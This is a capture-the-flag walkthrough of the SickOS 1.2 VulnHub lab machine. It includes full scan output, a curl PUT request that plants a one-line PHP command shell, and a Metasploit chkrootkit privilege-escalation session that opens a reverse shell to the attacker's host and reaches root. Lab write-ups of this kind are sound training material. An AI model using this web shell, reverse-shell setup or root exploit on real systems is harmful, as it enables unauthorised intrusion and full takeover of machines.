“This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.” – D4rk
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.132/24)
Target: SickOS: 1.2 (10.1.1.133/24)
Vulnerability & Exploit
File upload via HTTP PUT method
python reverse shell
chkrootkit 0.49 Local Root Exploit
Method
Scanned the network to discover the target server [arp-scan]
Port scanned the target to discover running services and open ports [masscan && nmap]
Use dirb tool to discover hidden directory [dirb]
Web application scanned to dig more information about web service [nikto]
Exploit HTTP PUT Method to upload one-line PHP shell
Use python reverse shell to get a better shell
Enumeration && Exploit chkrootkit 0.49 to get ROOT
Tools
All the tools used here can be found in Kali Linux
Using arp-scan as routine to detect the target’s IP address (10.1.1.133 in this case).
12345678910
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:f1:61:7e VMware, Inc.
10.1.1.133 00:0c:29:0f:eb:df VMware, Inc.
10.1.1.254 00:50:56:f0:91:47 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.290 seconds (111.79 hosts/sec). 4 responded
10.1.1.133 is our Target!
Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
12345678
root@kali:~# masscan -p1-65535 10.1.1.133/32 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-06-05 04:39:01 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]Discovered open port 22/tcp on 10.1.1.133
Discovered open port 80/tcp on 10.1.1.133
There are 2 ports (22, 80) detected by masscan, then I run nmap to do a deeper service scan.
1234567891011121314151617
# Nmap 7.12 scan initiated Sun Jun 5 14:40:00 2016 as: nmap -sV -A -O -v -oN 133_nmap.txt 10.1.1.133Nmap scan report for 10.1.1.133
Host is up (0.00034s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:
|1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)|2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:0F:EB:DF (VMware)... turncate ...
Run nikto to scan WEB application, but nothing found.
1234567
- Nikto v2.1.6/2.1.5
+ Target Host: 10.1.1.133
+ Target Port: 80
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ GET Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
Then run dirb to discover potential hidden directories and one folder was found: /test/.
1234567891011121314151617181920212223242526
root@kali:~/myExercises/sickos1.2# dirb http://10.1.1.133/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jun 5 14:46:31 2016
URL_BASE: http://10.1.1.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612---- Scanning URL: http://10.1.1.133/ ----
+ http://10.1.1.133/index.php (CODE:200|SIZE:163)==> DIRECTORY: http://10.1.1.133/test/
---- Entering directory: http://10.1.1.133/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w'if you want to scan it anyway)-----------------
END_TIME: Sun Jun 5 14:46:34 2016
DOWNLOADED: 4612 - FOUND: 1
Then try to enumerate HTTP methods by using curl. Nothing found in / but lots methods are available in /test/ including method PUT:
Now, uploading one-line PHP shell with PUT method.
1234567891011121314151617
root@kali:~/myExercises/sickos1.2# curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://10.1.1.133/test/shell.php
* Trying 10.1.1.133...
* Connected to 10.1.1.133 (10.1.1.133) port 80(#0)> PUT /test/shell.php HTTP/1.1
> Host: 10.1.1.133
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 30
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 30 out of 30 bytes
< HTTP/1.1 200 OK
< Content-Length: 0
< Date: Sun, 05 Jun 2016 05:04:11 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 10.1.1.133 left intact
Now set up nc to listen on port 443 (tried port ‘4444’ but failed due to be blocked) and Then I tried to upload reverse shell via wget but failed for some reason and finally got the following method works:
msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION 1 yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(chkrootkit) > set lport 8080
lport=> 8080
msf exploit(chkrootkit) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP double handler on 10.1.1.132:8080
[!] Rooting depends on the crontab (this could take a while)msf exploit(chkrootkit) > [*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cywywDOR3lw9KtfF;[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "cywywDOR3lw9KtfF\r\n"[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (10.1.1.132:8080 -> 10.1.1.133:47139) at 2016-06-05 15:47:03 +1000
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -l
Active sessions=============== Id Type Information Connection
-- ---- ----------- ----------
1 shell linux /bin/sh: 0: can't access tty; job control turned off $ 10.1.1.132:443 -> 10.1.1.133:33545 (10.1.1.133)2 shell unix 10.1.1.132:8080 -> 10.1.1.133:47139 (10.1.1.133)msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...
587635846
xjfpouiBcdHXtWSGDLawUifFliLoRHgO
trueglQiWVKYGXJIbMNxCzFdLkHTvwzJXMsL
XhEJPxQGJEXCqeHWEuuyRuhgtzDjhhsG
lblxnAmeZfPiTZxaWNHygwoaqIzqbUNo
id
uid=0(root)gid=0(root)groups=0(root)
Then grab the FLAG file:
1234567
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.